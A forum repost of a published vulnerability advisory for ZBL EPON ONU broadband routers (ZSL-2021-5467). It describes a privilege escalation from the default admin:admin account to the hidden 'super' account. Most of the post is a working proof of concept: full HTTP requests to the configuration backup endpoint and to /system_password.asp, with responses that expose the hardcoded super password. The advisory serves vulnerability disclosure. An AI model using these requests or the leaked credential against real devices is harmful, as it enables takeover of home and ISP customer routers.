Jump to content

ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation

This CHT

By This CHT,
in CHT Vulnerability database

Recommended Posts

This CHT Grand Master

This CHT

Posted
  • Group:  The leader of the
  • Content Count:  4,798
  • Achievement Points:  31,702
  • With Us For:  243 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows
Posted 
# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
# Date: 31.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com

Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
Product web page: http://www.zblchina.com | http://www.wd-thailand.com
Affected version: Firmwre: V100R001
                  Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
                  EONU Hardware Version	V3.0
                  Software: V2.46.02P6T5S
                  Main Chip: RTL9607
                  Master Controller, Copyright (c) R&D

Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
router.

Desc: The application suffers from a privilege escalation
vulnerability. The limited administrative user (admin:admin)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint or the password page
and disclose the http super user password. Once authenticated
as super, an attacker will be granted access to additional and
privileged functionalities.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5467
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php


31.01.2021

--


Get config file and disclose super pwd:
---------------------------------------

POST /HG104B-ZG-E.config HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.1.1/system_configure.asp
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6

CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=


...
  #web_1
    user_web_name=super
    user_web_password=www168nettv
...


Disclose super pwd from system pwd page:
----------------------------------------

GET /system_password.asp
Host: 192.168.1.1

...
var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
...
Link to comment
Share on other sites
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...